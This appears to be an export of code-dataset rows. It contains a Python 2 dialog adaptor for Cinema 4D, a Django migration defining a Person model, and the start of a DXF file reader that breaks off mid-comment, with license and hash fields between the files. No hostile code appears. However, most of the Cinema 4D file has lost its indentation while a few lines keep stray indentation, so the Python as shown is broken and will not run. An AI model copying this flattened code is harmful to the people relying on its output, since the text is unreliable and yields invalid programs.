""" Draw a checkBox
@type elem: dictionary
        @param elem: the checkbox dictionary
@type x: int
@param x: position on x in the gui windows
@type y: int
@param y: position on y in the gui windows
@type w: int
@param w: force the width of the item
@type h: int
@param h: force the height of the item
"""
if elem["alignement"] is None :
elem["alignement"] = c4d.BFH_CENTER | c4d.BFV_MASK
name = elem["name"]
if elem["label"] != None:
name = elem["label"]
self.AddCheckbox(id=elem["id"],flags=elem["alignement"],#BFH_SCALEFIT,
name=name,
initw=elem["width"]*self.scale,
inith=elem["height"]*self.scale)
if elem["value"] is not None :
self.SetBool(elem["id"],elem["value"])
def resetPMenu(self,elem):
""" Add an entry to the given pulldown menu
@type elem: dictionary
@param elem: the pulldown dictionary
"""
elem["value"]=[]
self.FreeChildren(elem["id"])
def addItemToPMenu(self,elem,item):
""" Add an entry to the given pulldown menu
@type elem: dictionary
@param elem: the pulldown dictionary
@type item: string
@param item: the new entry
"""
self.AddChild(elem["id"],len(elem["value"]),item)
elem["value"].append(item)
self.SetLong(elem["id"],len(elem["value"])-1)
def drawPMenu(self,elem,x,y,w=None,h=None):
""" Draw a pulldown menu
@type elem: dictionary
@param elem: the pulldown dictionary
@type x: int
@param x: position on x in the gui windows
@type y: int
@param y: position on y in the gui windows
@type w: int
@param w: force the width of the item
@type h: int
@param h: force the height of the item
"""
if elem["alignement"] is None :
elem["alignement"] = c4d.BFH_LEFT|c4d.BFH_SCALEFIT
self.AddComboBox(id=elem["id"],flags=elem["alignement"],
initw=elem["width"]*self.scale)
# inith=elem["height"]*self.scale)
[self.AddChild(elem["id"],x[0],x[1]) for x in enumerate(elem["value"])]
def drawLine(self,elem,x,y,w=None,h=None):
""" Draw a Separative Line
@type elem: dictionary
@param elem: the label dictionary
@type x: int
@param x: position on x in the gui windows
@type y: int
@param y: position on y in the gui windows
@type w: int
@param w: force the width of the item
@type h: int
@param h: force the height of the item
"""
if elem["value"] == "H":
self.AddSeparatorH(self.w,flags=c4d.BFH_SCALEFIT | c4d.BFV_MASK)
elif elem["value"] == "V":
self.AddSeparatorV(self.w,flags=c4d.BFH_SCALEFIT | c4d.BFV_MASK)
def drawLabel(self,label,x,y,w=None,h=None):
""" Draw a Label
@type elem: dictionary
@param elem: the label dictionary
@type x: int
@param x: position on x in the gui windows
@type y: int
@param y: position on y in the gui windows
@type w: int
@param w: force the width of the item
@type h: int
@param h: force the height of the item
"""
if label["alignement"] is None :
label["alignement"] = c4d.BFH_CENTER | c4d.BFV_MASK
self.AddStaticText(label["id"],flags=label["alignement"])#BFH_SCALEFIT)#|c4d.BFV_SCALEFIT)#c4d.BFH_LEFT)c4d.BFH_LEFT|
self.SetString(label["id"],label["label"])
def drawStringArea(self,elem,x,y,w=None,h=None):
""" Draw a String Area input elem, ie multiline
@type elem: dictionary
@param elem: the string area input dictionary
@type x: int
@param x: position on x in the gui windows
@type y: int
@param y: position on y in the gui windows
@type w: int
@param w: force the width of the item
@type h: int
@param h: force the height of the item
"""
if elem["alignement"] is None :
elem["alignement"] = c4d.BFH_CENTER | c4d.BFV_MASK
self.AddMultiLineEditText(id=elem["id"],
flags=elem["alignement"],
initw=elem["width"]*self.scale,
inith=elem["height"]*self.scale,
style=c4d.DR_MULTILINE_SYNTAXCOLOR)
self.SetString(elem["id"],elem["value"])
def drawString(self,elem,x,y,w=None,h=None):
""" Draw a String input elem
@type elem: dictionary
@param elem: the string input dictionary
@type x: int
@param x: position on x in the gui windows
@type y: int
@param y: position on y in the gui windows
@type w: int
@param w: force the width of the item
@type h: int
@param h: force the height of the item
"""
if elem["alignement"] is None :
elem["alignement"] = c4d.BFH_CENTER | c4d.BFV_MASK
self.AddEditText(id=elem["id"],
flags=elem["alignement"],#| c4d.BFV_MASK,#BFH_CENTER
initw=elem["width"]*self.scale,
inith=elem["height"]*self.scale)
self.SetString(elem["id"],elem["value"])
def drawSliders(self,elem,x,y,w=None,h=None):
""" Draw a Slider elem, the variable/value of the elem define the slider format
@type elem: dictionary
@param elem: the slider input dictionary
@type x: int
@param x: position on x in the gui windows
@type y: int
@param y: position on y in the gui windows
@type w: int
@param w: force the width of the item
@type h: int
@param h: force the height of the item
"""
if elem["alignement"] is None :
elem["alignement"] = c4d.BFH_CENTER | c4d.BFV_MASK
self.AddEditSlider(id=elem["id"],
flags=elem["alignement"],
initw=elem["width"]*self.scale,
inith=elem["height"]*self.scale)
if elem["variable"] is None :
elem["variable"] =0.0
if elem["maxi"] is None :
elem["maxi"] =0.0
if elem["mini"] is None :
elem["mini"] =0.0
if elem["step"] is None :
elem["step"] =0.0
self.SetReal(elem["id"],float(elem["variable"]),float(elem["mini"]),
float(elem["maxi"]), float(elem["step"]))
def drawNumbers(self,elem,x,y,w=None,h=None):
""" Draw a Int input elem
@type elem: dictionary
@param elem: the Int input dictionary
@type x: int
@param x: position on x in the gui windows
@type y: int
@param y: position on y in the gui windows
@type w: int
@param w: force the width of the item
@type h: int
@param h: force the height of the item
"""
if elem["alignement"] is None :
elem["alignement"] = c4d.BFH_CENTER | c4d.BFV_MASK
if elem["value"] is None :
elem["value"] = elem["variable"]
self.AddEditNumberArrows(id=elem["id"],
flags=elem["alignement"],
initw=elem["width"]*self.scale,
inith=elem["height"]*self.scale)
self.SetLong(elem["id"],int(elem["value"]),int(elem["mini"]),
int(elem["maxi"]))
def drawFloat(self,elem,x,y,w=None,h=None):
""" Draw a float input elem
@type elem: dictionary
        @param elem: the Float input dictionary
@type x: int
@param x: position on x in the gui windows
@type y: int
@param y: position on y in the gui windows
@type w: int
@param w: force the width of the item
@type h: int
@param h: force the height of the item
"""
if elem["alignement"] is None :
elem["alignement"] = c4d.BFH_CENTER | c4d.BFV_MASK
if elem["value"] is None :
elem["value"] = elem["variable"]
if elem["value"] is None :
elem["value"] =0.0
if elem["maxi"] is None :
elem["maxi"] =0.0
if elem["mini"] is None :
elem["mini"] =0.0
self.AddEditNumberArrows(id=elem["id"],
flags=elem["alignement"],
initw=elem["width"]*self.scale,
inith=elem["height"]*self.scale)
#print float(elem["value"]),float(elem["mini"]),float(elem["maxi"])
self.SetReal(elem["id"],float(elem["value"]),float(elem["mini"]),
float(elem["maxi"]))
def drawImage(self,elem,x,y,w=None,h=None):
""" Draw an Image, if the host supported it
@type elem: dictionary
@param elem: the image input dictionary
@type x: int
@param x: position on x in the gui windows
@type y: int
@param y: position on y in the gui windows
@type w: int
@param w: force the width of the item
@type h: int
@param h: force the height of the item
"""
pass
# bmp = c4d.bitmaps.BaseBitmap()
# bmp.InitWith(elem["value"])
# bc = c4d.BaseContainer()
# need to use userarea
# area = c4d.gui.GeUserArea()
# self.AddUserArea(5000,flags=c4d.BFH_SCALEFIT,initw=100, inith=150)
# self.AttachUserArea(area, id=10, userareaflags=c4d.USERAREA_COREMESSAGE)
# self.area.DrawBitmap(bmp, 0, 0, 396, 60, 0, 0, 396, 60, mode=c4d.BMP_NORMALSCALED)#396x60
## self.area.DrawText('welcome to ePMV '+__version__, 0, 0, flags=c4d.DRAWTEXT_STD_ALIGN)
# self.area.Init()
# self.area.InitValues()
def drawColorField(self,elem,x,y,w=None,h=None):
""" Draw a Color entry Field
@type elem: dictionary
@param elem: the color input dictionary
@type x: int
@param x: position on x in the gui windows
@type y: int
@param y: position on y in the gui windows
@type w: int
@param w: force the width of the item
@type h: int
@param h: force the height of the item
"""
if elem["alignement"] is None :
elem["alignement"] = elem["alignement"]
# print elem
self.AddColorField(id=elem["id"],flags=elem["alignement"],
initw=elem["width"]*self.scale,
inith=elem["height"]*self.scale)
if elem["value"]is not None:
# print "v",elem["value"]
self.setColor(elem,elem["value"])
# print "n",elem["name"]
def drawError(self,errormsg=""):
""" Draw a error message dialog
@type errormsg: string
        @param errormsg: the message to display
"""
c4d.gui.MessageDialog("ERROR: "+errormsg)
def drawQuestion(self,title="",question="",callback=None):
""" Draw a Question message dialog, requiring a Yes/No answer
@type title: string
@param title: the windows title
@type question: string
@param question: the question to display
@rtype: bool
@return: the answer
"""
res = c4d.gui.QuestionDialog(question)
if callback is not None :
callback(res)
else :
return res
def drawMessage(self,title="",message=""):
""" Draw a message dialog
@type title: string
@param title: the windows title
@type message: string
@param message: the message to display
"""
c4d.gui.MessageDialog(message)
def drawInputQuestion(self,title="",question="",callback=None):
""" Draw an Input Question message dialog, requiring a string answer
@type title: string
@param title: the windows title
@type question: string
@param question: the question to display
@rtype: string
@return: the answer
"""
result = c4d.gui.InputDialog(question,"")
if result :
if callback is not None :
callback(result)
else :
return result
def drawFrame(self,bloc,x,y):
"""
        Function to draw a block as a collapsible frame layout of the gui.
        @type bloc: array or dictionary
        @param bloc: list or dictionary of item dictionaries
@type x: int
@param x: position on x in the gui windows, used for blender
@type y: int
@param y: position on y in the gui windows, used for blender
@rtype: int
@return: the new horizontal position, used for blender
"""
grFlag = c4d.BFH_SCALEFIT# |c4d.BFV_MASK
if bloc["scrolling"]:
self.ScrollGroupBegin(id=50000, flags= c4d.BFH_SCALEFIT |c4d.BFV_SCALEFIT,
scrollflags= c4d.SCROLLGROUP_NOSCROLLER|c4d.SCROLLGROUP_NOBLIT)#c4d.SCROLLGROUP_VERT|c4d.SCROLLGROUP_AUTOVERT)
# inith=100,initw=1000)
grFlag = c4d.BFH_SCALEFIT |c4d.BFV_SCALEFIT
else :
self.ScrollGroupBegin(id=50000, flags= c4d.BFH_SCALEFIT |c4d.BFV_SCALEFIT,
scrollflags= c4d.SCROLLGROUP_NOSCROLLER|c4d.SCROLLGROUP_NOBLIT)#c4d.SCROLLGROUP_VERT|c4d.SCROLLGROUP_AUTOVERT)
# inith=100,initw=1000)
if bloc["collapse"] :
collapse = c4d.BFV_BORDERGROUP_FOLD#|c4d.BFV_GRIDGROUP_EQUALCOLS
else :
collapse = c4d.BFV_BORDERGROUP_FOLD|c4d.BFV_BORDERGROUP_FOLD_OPEN
self.GroupBegin(id=bloc["id"],title=bloc["name"],cols=1,#rows=len(bloc["elems"]),
flags= c4d.BFH_SCALEFIT |c4d.BFV_SCALEFIT,
groupflags=collapse)
self.GroupBorder(c4d.BORDER_ROUND|c4d.BORDER_THIN_IN|c4d.BORDER_WITH_TITLE|c4d.BORDER_MASK)#|c4d.BORDER_MASK
# self.GroupBorderSpace(self.left, self.top, self.right, self.bottom)
for k,blck in enumerate(bloc["elems"]):
self.startBlock(m=len(blck))
for index, item in enumerate(blck):
self._drawElem(item,x,y)
self.endBlock()
self.endBlock()
self.endBlock()
#if bloc["scrolling"]:
# self.endBlock()#scroll
# self.endBlock()#main
return y
def drawTab(self,bloc,x,y):
"""
        Function to draw a block as a tab layout of the gui.
        @type bloc: array or dictionary
        @param bloc: list or dictionary of item dictionaries
@type x: int
@param x: position on x in the gui windows, used for blender
@type y: int
@param y: position on y in the gui windows, used for blender
@rtype: int
@return: the new horizontal position, used for blender
"""
        #TODO the Group system is confusing and needs to be improved in uPy
#can we change color?
if not self.tab :
self.notebook = self.TabGroupBegin(id=bloc["id"]*1000,#title=bloc["name"],cols=1,
flags=c4d.BFH_SCALEFIT | c4d.BFV_SCALEFIT,
tabtype=c4d.TAB_TABS)
self.GroupBorder(c4d.BORDER_THIN_IN|c4d.BORDER_MASK)#c4d.BORDER_BLACK|BORDER_WITH_TITLE
self.tab = True
# self.GroupBorderSpace(self.left, self.top, self.right, self.bottom)
grFlag = c4d.BFH_SCALEFIT |c4d.BFV_MASK
self.GroupBegin(id=bloc["id"],title=bloc["name"],cols=1,#initw=self.w,inith=self.h,
flags=grFlag)#c4d.BFH_SCALEFIT|c4d.BFV_SCALEFIT)#BFH_CENTER)
if bloc["scrolling"]:
self.ScrollGroupBegin(id=bloc["id"]*5, flags=c4d.BFH_SCALEFIT|c4d.BFV_SCALEFIT,
scrollflags=c4d.SCROLLGROUP_VERT|c4d.SCROLLGROUP_AUTOVERT)
# inith=100,initw=1000)
grFlag = c4d.BFH_SCALEFIT |c4d.BFV_SCALEFIT
# self.GroupBorderNoTitle(c4d.BORDER_NONE|c4d.BORDER_WITH_TITLE)
#should use max number of column?
#get max nb elem:
        maxi = 0
        for k,blck in enumerate(bloc["elems"]):
            if len(blck) > maxi :
                maxi = len(blck)
self.GroupBegin(id=bloc["id"],title=bloc["name"],cols=1,#initw=self.w,inith=self.h,
flags=grFlag)#c4d.BFH_SCALEFIT|c4d.BFV_SCALEFIT)#BFH_CENTER)
# if bloc["scrolling"]:
# self.GroupBorder(c4d.BORDER_THIN_IN|c4d.BORDER_WITH_TITLE|c4d.BORDER_WITH_TITLE_BOLD| c4d.BORDER_MASK)
# else :
# self.GroupBorderNoTitle(c4d.BORDER_THIN_IN|c4d.BORDER_MASK)
# if self.scrolling:
# self.ScrollGroupBegin(id=bloc["id"]*5000, flags=c4d.BFH_CENTER | c4d.BFV_MASK,#initw=self.w,inith=self.h,
# scrollflags=c4d.SCROLLGROUP_VERT|c4d.SCROLLGROUP_AUTOVERT|c4d.SCROLLGROUP_BORDERIN|c4d.SCROLLGROUP_STATUSBAR | c4d.SCROLLGROUP_NOBLIT)
# BFV_SCALEFIT | BFH_SCALEFIT,
# SCROLLGROUP_STATUSBAR | SCROLLGROUP_BORDERIN |
# SCROLLGROUP_NOBLIT
for k,blck in enumerate(bloc["elems"]):
if type(blck) is list :
self.GroupBegin(id=int(k*25),cols=len(blck),title=str(k),
flags=c4d.BFH_SCALEFIT)#c4d.BFH_CENTER)
for index, item in enumerate(blck):
self._drawElem(item,x,y)
self.endBlock()
else : #dictionary: multiple line / format dict?
if "0" in blck:
y = self._drawGroup(blck,x,y)
else :
blck["scrolling"] = False
y = self._drawFrame(blck,x,y)
# if self.scrolling:
# self.endBlock()
if bloc["scrolling"]:
self.endBlock()
self.endBlock()
self.endBlock()
# self.LayoutChanged(bloc["id"])
return y
def saveDialog(self,label="",callback=None, suffix=""):
""" Draw a File input dialog
@type label: string
@param label: the windows title
@type callback: function
@param callback: the callback function to call
"""
filename = c4d.storage.SaveDialog(c4d.FSTYPE_ANYTHING,label)
if callback is not None:
return callback(filename)
else :
return filename
def fileDialog(self,label="",callback=None, suffix=""):
""" Draw a File input dialog
@type label: string
@param label: the windows title
@type callback: function
@param callback: the callback function to call
"""
filename = c4d.storage.LoadDialog(c4d.FSTYPE_ANYTHING,label)
if callback is not None:
return callback(filename)
else :
return filename
def waitingCursor(self,toggle):
""" Toggle the mouse cursor appearance from the busy to idle.
@type toggle: Bool
        @param toggle: Whether the cursor is busy or idle
"""
if not toggle :
c4d.gui.SetMousePointer(c4d.MOUSE_NORMAL)
else :
c4d.gui.SetMousePointer(c4d.MOUSE_BUSY)
def updateViewer(self):
"""
update the 3d windows if any
"""
c4d.EventAdd()
c4d.DrawViews(c4d.DRAWFLAGS_ONLY_ACTIVE_VIEW|c4d.DRAWFLAGS_NO_THREAD|c4d.DRAWFLAGS_NO_ANIMATION)
c4d.GeSyncMessage(c4d.EVMSG_TIMECHANGED)
def startBlock(self,m=1,n=1):
if m == 0:
m = 1
self.GroupBegin(id=1,flags=c4d.BFH_SCALEFIT | c4d.BFV_MASK,
cols=m, rows=n)
self.GroupBorderSpace(self.left, self.top, self.right, self.bottom)
# self.bid+=1
def endBlock(self):
self.GroupEnd()
#self.GroupEnd()
def startLayout(self):
grFlag = c4d.BFH_SCALEFIT |c4d.BFV_MASK
grFlag = c4d.BFH_SCALEFIT| c4d.BFV_SCALEFIT | c4d.BFV_GRIDGROUP_EQUALROWS
if self.scrolling:
self.ScrollGroupBegin(id=2, flags=grFlag,
scrollflags=c4d.SCROLLGROUP_VERT)
#grFlag = c4d.BFH_SCALEFIT |c4d.BFV_SCALEFIT
self.GroupBegin(id=1,flags=grFlag ,cols=1)#initw ?
#self.GroupBorder(c4d.BORDER_ROUND|c4d.BORDER_THIN_IN)
def endLayout(self):
self.GroupEnd()
if self.scrolling:
self.GroupEnd()
## SCROLLGROUP_VERT Allow the group to scroll vertically.
## SCROLLGROUP_HORIZ Allow the group to scroll horizontally.
## SCROLLGROUP_NOBLIT Always redraw the whole group, not just new areas, when scrolling.
## SCROLLGROUP_LEFT Create the vertical slider to the left.
## SCROLLGROUP_BORDERIN Display a small border around the scroll group.
## SCROLLGROUP_STATUSBAR Create a status bar for the scroll group.
## SCROLLGROUP_AUTOHORIZ Only show horizontal slider if needed.
## SCROLLGROUP_AUTOVERT Only show vertical slider if needed.
## SCROLLGROUP_NOSCROLLER No scroller.
## SCROLLGROUP_NOVGAP No vertical gap.
## SCROLLGROUP_STATUSBAR_EXT_GROUP Creates an extern group within the statusbar.
# if self.scrolling:
# self.ScrollGroupBegin(id=50000, flags=c4d.BFH_SCALEFIT | c4d.BFV_SCALEFIT,
# scrollflags=c4d.SCROLLGROUP_VERT|c4d.SCROLLGROUP_AUTOVERT)
# self.GroupBorderSpace(self.left, self.top, self.right, self.bottom)
##
# if self.tab:
# self.GroupEnd()#self.Activate(1)#GroupEnd()
#
def getString(self,elem):
""" Return the current string value of the String Input elem
@type elem: dictionary
@param elem: the elem input dictionary
@rtype: string
@return: the current string input value for this specific elem
"""
return self.GetString(elem["id"])
def setString(self,elem,val):
""" Set the current String value of the string input elem
@type elem: dictionary
@param elem: the elem input dictionary
@type val: string
@param val: the new string value
"""
self.SetString(elem["id"],val)
def getStringArea(self,elem):
""" Return the current string area value of the String area Input elem
@type elem: dictionary
@param elem: the elem input dictionary
@rtype: string
@return: the current string area input value for this specific elem
"""
return self.GetString(elem["id"])
def setStringArea(self,elem,val):
""" Set the current String area value of the string input elem
@type elem: dictionary
@param elem: the elem input dictionary
@type val: string
@param val: the new string value (multiline)
"""
self.SetString(elem["id"],val)
def getReal(self,elem):
""" Return the current Float value of the Input elem
@type elem: dictionary
@param elem: the elem input dictionary
@rtype: Float
@return: the current Float value input for this specific elem
"""
val = self.GetReal(elem["id"])
#check if its a real actually
if isinstance(val, float):
return val
def setReal(self,elem,val):
""" Set the current Float value of the Float input elem
@type elem: dictionary
@param elem: the elem input dictionary
@type val: Float
@param val: the new Float value
"""
print elem,val
print type(val)
return self.SetReal(elem["id"],float(val))
def getBool(self,elem):
""" Return the current Bool value of the Input elem
@type elem: dictionary
@param elem: the elem input dictionary
@rtype: Bool
@return: the current Bool value input for this specific elem
"""
return self.GetBool(elem["id"])
def setBool(self,elem,val):
""" Set the current Bool value of the Bool input elem
@type elem: dictionary
@param elem: the elem input dictionary
@type val: Bool
@param val: the new Bool value
"""
return self.SetBool(elem["id"],bool(val))
def getLong(self,elem):
""" Return the current Int value of the Input elem
@type elem: dictionary
@param elem: the elem input dictionary
@rtype: Int
@return: the current Int value input for this specific elem
"""
val = self.GetLong(elem["id"])
if isinstance(val, int):
return val
def setLong(self,elem,val):
""" Set the current Int value of the Int input elem
@type elem: dictionary
@param elem: the elem input dictionary
@type val: Int
@param val: the new Int value
"""
return self.SetLong(elem["id"],int(val))
def getColor(self,elem):
""" Return the current Color value of the Input elem
@type elem: dictionary
@param elem: the elem input dictionary
@rtype: Color
@return: the current Color array RGB value input for this specific elem
"""
c4dcol = self.GetColorField(elem["id"])['color']
return [c4dcol.x,c4dcol.y,c4dcol.z]
def setColor(self,elem,val):
""" Set the current Color rgb arrray value of the Color input elem
@type elem: dictionary
@param elem: the elem input dictionary
@type val: Color
@param val: the new Color value
"""
# print "in setColor",elem
c4dcol = self.GetColorField(elem["id"])
# print elem["id"]
c4dcol['color'].x=val[0]
c4dcol['color'].y=val[1]
c4dcol['color'].z=val[2]
self.SetColorField(elem["id"],c4dcol['color'],1.0,1.0,0)
def setAction(self,elem,callback):
elem["action"] = callback
def updateSlider(self,elem,mini,maxi,default,step):
""" Update the state of the given slider, ie format, min, maxi, step
@type elem: dictionary
@param elem: the slider elem dictionary
@type maxi: int/float
@param maxi: max value for the item, ie slider
@type mini: int/float
@param mini: min value for the item, ie slider
@type default: int/float
@param default: default value for the item, ie slider
@type step: int/float
@param step: step value for the item, ie slider
"""
if type(step) is int:
doit = self.SetLong
else :
doit = self.SetReal
doit(elem["id"],default,mini,maxi,step)
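    # Illustrative sketch (not part of the original adaptor): updateSlider picks
    # SetLong or SetReal based on the type of `step`, so assuming `elem` is a
    # slider dictionary created by drawSliders:
    #     self.updateSlider(elem, 0, 100, 50, 1)        # int step   -> SetLong
    #     self.updateSlider(elem, 0.0, 1.0, 0.5, 0.1)   # float step -> SetReal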
@classmethod
def _restore(self,rkey,dkey=None):
"""
        Function used to restore the windows data, useful for plugins
@type rkey: string
@param rkey: the key to access the data in the registry/storage
@type dkey: string
        @param dkey: whether we want a particular entry from the stored dict
"""
if hasattr(c4d,rkey):
obj = c4d.__dict__[rkey]
if dkey is not None:
if c4d.__dict__[rkey].has_key(dkey) :
return c4d.__dict__[rkey][dkey]
else :
return None
return obj
else :
return None
@classmethod
def _store(self,rkey,dict):
"""
        Function used to store the windows data, useful for plugins
@type rkey: string
@param rkey: the key to access the data in the registry/storage
@type dict: dictionary
        @param dict: the storage is done through a dictionary
"""
c4d.__dict__[rkey]= dict
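    # Illustrative sketch (hypothetical key name): _store/_restore keep a plain
    # dictionary alive on the c4d module between dialog sessions, e.g.
    #     cls._store("uiadaptor_prefs", {"scale": 1.0})
    #     cls._restore("uiadaptor_prefs", "scale")   # -> 1.0, or None if missing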
def drawSubDialog(self,dial,id,callback = None,asynchro = True):
"""
        Draw the given subdialog with its own elements and callback
@type dial: dialog Object
@param dial: the dialog object to be draw
@type id: int
@param id: the id of the dialog
@type callback: function
@param callback: the associate callback
"""
print (dial,id,asynchro)
if asynchro :
dial.Open(c4d.DLG_TYPE_ASYNC, pluginid=id, defaultw=dial.w, defaulth=dial.h)
else :
dial.Open(c4d.DLG_TYPE_MODAL, pluginid=id, defaultw=dial.w, defaulth=dial.h)
def close(self,*args):
""" Close the windows"""
self.Close()
def display(self):
""" Create and Open the current gui windows """
#how to display it/initialize it ?
self.Open(c4d.DLG_TYPE_ASYNC, pluginid=self.plugid,
defaultw=self.w, defaulth=self.h)
def getDirectory(self):
"""return software directory for script and preferences"""
prefpath=c4d.storage.GeGetC4DPath(1)
os.chdir(prefpath)
os.chdir(".."+os.sep)
self.prefdir = os.path.abspath(os.curdir)
if sys.platform == "darwin" :
self.softdir = c4d.storage.GeGetC4DPath(4)
elif sys.platform == "win32":
self.softdir = c4d.storage.GeGetC4DPath(2)
class c4dUIDialog(c4dUI,uiAdaptor):
def __init__(self,**kw):
if kw.has_key("title"):
self.title= kw["title"]
self._setTitle(self.title)
#class c4dUISubDialog(c4dUI,uiAdaptor):
# def __init__(self,):
# c4dUIDialog.__init__(self,)
#
###############WIDGET####################################
import time
class TimerDialog(c4d.gui.SubDialog):
"""
    Timer dialog for c4d, waits a given time for user input.
from Pmv.hostappInterface.cinema4d_dev import helperC4D as helper
dial = helper.TimerDialog()
dial.cutoff = 30.0
dial.Open(c4d.DLG_TYPE_ASYNC, pluginid=3555550, defaultw=250, defaulth=100)
"""
def init(self):
self.startingTime = time.time()
self.dT = 0.0
self._cancel = False
self.SetTimer(100) #miliseconds
#self.cutoff = ctime #seconds
#self.T = int(ctime)
def initWidgetId(self):
id = 1000
self.BTN = {"No":{"id":id,"name":"No",'width':50,"height":10,
"action":self.continueFill},
"Yes":{"id":id+1,"name":"Yes",'width':50,"height":10,
"action":self.stopFill},
}
id += len(self.BTN)
self.LABEL_ID = [{"id":id,"label":"Did you want to Cancel the Job:"},
{"id":id+1,"label":str(self.cutoff) } ]
id += len(self.LABEL_ID)
return True
def CreateLayout(self):
ID = 1
self.SetTitle("Cancel?")
self.initWidgetId()
        #minimize option/button
self.GroupBegin(id=ID,flags=c4d.BFH_SCALEFIT | c4d.BFV_MASK,
cols=2, rows=10)
self.GroupBorderSpace(10, 10, 5, 10)
ID +=1
self.AddStaticText(self.LABEL_ID[0]["id"],flags=c4d.BFH_LEFT)
self.SetString(self.LABEL_ID[0]["id"],self.LABEL_ID[0]["label"])
self.AddStaticText(self.LABEL_ID[1]["id"],flags=c4d.BFH_LEFT)
self.SetString(self.LABEL_ID[1]["id"],self.LABEL_ID[1]["label"])
ID +=1
for key in self.BTN.keys():
self.AddButton(id=self.BTN[key]["id"], flags=c4d.BFH_LEFT | c4d.BFV_MASK,
initw=self.BTN[key]["width"],
inith=self.BTN[key]["height"],
name=self.BTN[key]["name"])
self.init()
return True
def open(self):
self.Open(c4d.DLG_TYPE_MODAL, pluginid=25555589, defaultw=120, defaulth=100)
def Timer(self,val):
        #print val ; val seems to be the gadget itself ?
        #used to see if the user answered or not... i.e. if nothing happened after x ms
        #close the dialog
# self.T -= 1.0
        current_time = time.time()
        self.dT = current_time - self.startingTime
# print self.dT, self.T
self.SetString(self.LABEL_ID[1]["id"],str(self.cutoff-self.dT ))
if self.dT > self.cutoff :
self.continueFill()
def stopFill(self):
self._cancel = True
self.Close()
def continueFill(self):
self._cancel = False
self.Close()
def Command(self, id, msg):
for butn in self.BTN.keys():
if id == self.BTN[butn]["id"]:
self.BTN[butn]["action"]()
return True
|
gpl-3.0
| 645,004,486,327,748,500
| 37.44592
| 142
| 0.540422
| false
| 3.691201
| false
| false
| false
|
tdfischer/organizer
|
crm/migrations/0001_initial.py
|
1
|
1152
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.1 on 2018-07-27 07:36
from __future__ import unicode_literals
import address.models
from django.db import migrations, models
import django.db.models.deletion
import taggit.managers
class Migration(migrations.Migration):
initial = True
dependencies = [
('address', '0001_initial'),
('taggit', '0002_auto_20150616_2121'),
]
operations = [
migrations.CreateModel(
name='Person',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('email', models.CharField(max_length=200)),
('created', models.DateTimeField(auto_now_add=True)),
('address', address.models.AddressField(blank=True, on_delete=django.db.models.deletion.CASCADE, to='address.Address')),
('tags', taggit.managers.TaggableManager(help_text='A comma-separated list of tags.', through='taggit.TaggedItem', to='taggit.Tag', verbose_name='Tags')),
],
),
]
|
agpl-3.0
| 8,889,659,258,526,600,000
| 35
| 170
| 0.615451
| false
| 3.972414
| false
| false
| false
|
JohnyEngine/CNC
|
deprecated/heekspython/examples/dxfReader.py
|
1
|
11845
|
"""This module provides a function for reading dxf files and parsing them into a useful tree of objects and data.
The convert function is called by the readDXF function to convert dxf strings into the correct data based
on their type code. readDXF expects a (full path) file name as input.
"""
# --------------------------------------------------------------------------
# DXF Reader v0.9 by Ed Blake (AKA Kitsu)
# 2008.05.08 modif.def convert() by Remigiusz Fiedler (AKA migius)
# --------------------------------------------------------------------------
# ***** BEGIN GPL LICENSE BLOCK *****
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
#
# ***** END GPL LICENCE BLOCK *****
# --------------------------------------------------------------------------
from dxfImportObjects import *
class Object:
"""Empty container class for dxf objects"""
def __init__(self, _type='', block=False):
"""_type expects a string value."""
self.type = _type
self.name = ''
self.data = []
def __str__(self):
if self.name:
return self.name
else:
return self.type
def __repr__(self):
return str(self.data)
def get_type(self, kind=''):
"""Despite the name, this method actually returns all objects of type 'kind' from self.data."""
if type:
objects = []
for item in self.data:
if type(item) != list and item.type == kind:
# we want this type of object
objects.append(item)
elif type(item) == list and item[0] == kind:
# we want this type of data
objects.append(item[1])
return objects
class InitializationError(Exception): pass
class StateMachine:
"""(finite) State Machine from the great David Mertz's great Charming Python article."""
def __init__(self):
self.handlers = []
self.startState = None
self.endStates = []
def add_state(self, handler, end_state=0):
"""All states and handlers are functions which return
a state and a cargo."""
self.handlers.append(handler)
if end_state:
self.endStates.append(handler)
def set_start(self, handler):
"""Sets the starting handler function."""
self.startState = handler
def run(self, cargo=None):
if not self.startState:
raise InitializationError,\
"must call .set_start() before .run()"
if not self.endStates:
raise InitializationError, \
"at least one state must be an end_state"
handler = self.startState
while 1:
(newState, cargo) = handler(cargo)
#print cargo
if newState in self.endStates:
return newState(cargo)
#break
elif newState not in self.handlers:
raise RuntimeError, "Invalid target %s" % newState
else:
handler = newState
def get_name(data):
"""Get the name of an object from its object data.
Returns a pair of (data_item, name) where data_item is the list entry where the name was found
    (the data_item can be used to remove the entry from the object data). Be sure to check
    that name is not None before using the returned values!
"""
value = None
for item in data:
if item[0] == 2:
value = item[1]
break
return item, value
def get_layer(data):
"""Expects object data as input.
Returns (entry, layer_name) where entry is the data item that provided the layer name.
"""
value = None
for item in data:
if item[0] == 8:
value = item[1]
break
return item, value
def convert(code, value):
"""Convert a string to the correct Python type based on its dxf code.
code types:
ints = 60-79, 170-179, 270-289, 370-389, 400-409, 1060-1070
longs = 90-99, 420-429, 440-459, 1071
floats = 10-39, 40-59, 110-139, 140-149, 210-239, 460-469, 1010-1059
hex = 105, 310-379, 390-399
strings = 0-9, 100, 102, 300-309, 410-419, 430-439, 470-479, 999, 1000-1009
"""
if 59 < code < 80 or 169 < code < 180 or 269 < code < 290 or 369 < code < 390 or 399 < code < 410 or 1059 < code < 1071:
value = int(float(value))
elif 89 < code < 100 or 419 < code < 430 or 439 < code < 460 or code == 1071:
value = long(float(value))
elif 9 < code < 60 or 109 < code < 150 or 209 < code < 240 or 459 < code < 470 or 1009 < code < 1060:
value = float(value)
elif code == 105 or 309 < code < 380 or 389 < code < 400:
value = int(value, 16) # should be left as string?
else: # it's already a string so do nothing
pass
return value
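# Illustrative sketch (not part of the original reader), showing how convert()
# maps a dxf group code to a Python type per the ranges documented above:
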